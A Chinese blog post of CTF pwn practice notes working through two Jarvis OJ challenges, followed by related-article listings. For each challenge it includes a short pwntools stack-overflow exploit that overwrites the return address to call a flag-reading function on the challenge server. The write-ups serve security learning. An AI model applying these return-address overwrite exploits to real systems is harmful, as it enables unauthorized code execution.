pwn 练习笔记 暑假十一天

最新推荐文章于 2024-02-23 14:43:20 发布
最新推荐文章于 2024-02-23 14:43:20 发布
阅读量484 收藏
点赞数
分类专栏: 训练 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38783875/article/details/81170446
版权

题目来自:https://www.jarvisoj.com/challenges

guestbook,一道特别简单的题

checksec查看:有个栈不可执行保护,没什么问题

IDA打开查看伪代码,先看main函数:

还看到调用了fopen和fgetc这样的函数,所以找了一下,发现good_game这个函数;

这个函数读取了flag.txt,这个函数的开始地址为0000000000400620

所以构造payload,把返回地址覆盖为这个函数的地址,就可以读取到flag

脚本如下

from pwn import *
sh = remote('pwn.jarvisoj.com',9876)
good_addr = 0x0000000000400620

payload = 'a'*136 +p64(good_addr)
sh.recvuntil("Input your message:\n")
sh.send(payload)
print sh.recv()

Test Your Memory

checksec查看:栈不可执行保护,其他没什么特别的

IDA打开:

设置了随机种子,要把字符串alphanum里面的随机三个字符,赋值给v5,再把v5作为mem_test函数的参数,查看mem_test

查看hint的内容

hint 是输出了字符串acatflag的地址(0x080487E0),acatflag的内容为‘cat flag’

然后发现有win_func函数,内容为

给win_func函数传的参数,会被当做命令执行,win_func的地址为0x080485BD

构造payload 覆盖返回地址为win_func的地址,然后把acatflag作为参数传进去

脚本如下

from pwn import *
sh = remote('pwn2.jarvisoj.com',9876)
sys_addr = 0x080485BD
cat_addr = 0x080487E0

payload = 'a'*23 +p32(sys_addr)+p32(0x08048662)+p32(cat_addr)#0x13+4=23
sh.sendline(payload)
sh.interactive()

未解之谜,为什么win_func的返回地址为正确地址是才会返回flag,不能像其他题一样,用一个不存在的地址

攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 645
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
pwn 练习笔记 暑假的第二天 got表覆盖
SsMing的博客
07-14 2594
pwnable passcode1.ssh连上去看源码:#include <stdio.h>#include <stdlib.h>void login(){    int passcode1;    int passcode2;    printf("enter passcode1 : ");    scanf("%d", passcode1);    fflush(std...
pwn 练习
zip471642048的博客
05-31 562
文章目录read_shellcode read_shellcode 师傅出的一个栈溢出的题,思路就是利用read往bss段写入shellcode然后调用 日常checksec一下,啥都没开 运行主程序可以看出来,程序读入了一个字符串无打印 gdb调试的时候可以看到是调用了plt的read函数,说明他读入字符串是用的read@plt,我们可以用read往栈或者bss段写东西,或者利用gadget系统调用 这么几个gadget明显不够,系统调用pass 可以看到栈可以读可写,bss段也是
pwn练习
最新发布
WuMing_Z的博客
02-23 2390
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
PWN练习网站
GJQI12的专栏
04-10 2485
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWNPWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
pwn练习 2022.10.03
m0_53932372的博客
10-03 220
pwn
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
pwn学习笔记(一)
qq_41560595的博客
03-18 1748
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3943
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
PWN综合练习
WateranFire的博客
10-27 516
合天上的课程笔记 dup2(socket,0)——将socket与标准输入绑定 dup2(socket,1)——将socket与标准输出绑定 realpath(name,&resolved)——将name中的路径转为绝对路径存入resolved 就算realpath调用失败,resolved内还是会填充数据,并且前缀会加上当前路径,构造shellcode时需要注意 有时应该打印出了内容但接
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2573
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界 pwn 新手练习区 hello_pwn
ChaoYue_miku的博客
07-06 598
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
pwn 练习笔记 暑假第七天
SsMing的博客
07-19 445
题目来自:https://www.jarvisoj.com/challenges level3 checksec查看: ida打开: 栈溢出,buf与ebp相距0x88(136) 一起下载到的还有个libc-2.19.so动态链接库文件,这就很好办啦!二次溢出拿到flag 直接上脚本: from pwn import * #sh = process('level3') ...
pwn 练习笔记 暑假的第一天
SsMing的博客
07-14 478
pwnable  bof 源码如下#include <stdio.h>#include <string.h>#include <stdlib.h>void func(int key){    char overflowme[32];    printf("overflow me : ");    gets(overflowme);    // smash me!...
pwn入门
九层台
03-27 1万+
之前学过一点关于pwn,不过总是断断续续,学一点就停止了,这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去 查看fd.c文件 main函数中:argc是命令行参数个数,char *argv[]是指所有命令行参数,char *envp[]是环境变量(argv[1]位置处存放的是命令行输入的第一个参数) atoi函数的作用是把字符转化为int型数据。 ...
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 916
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
Pwn练习:四道CTF竞赛题目及解题EXP解析
这种漏洞的利用难度相对较高,但仍然是pwn练习中不可或缺的一部分。 4. 整数溢出漏洞(Integer Overflow): 整数溢出发生在算术运算导致整数值超出其可能的最大值或最小值时。如果程序没有正确处理这种溢出,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值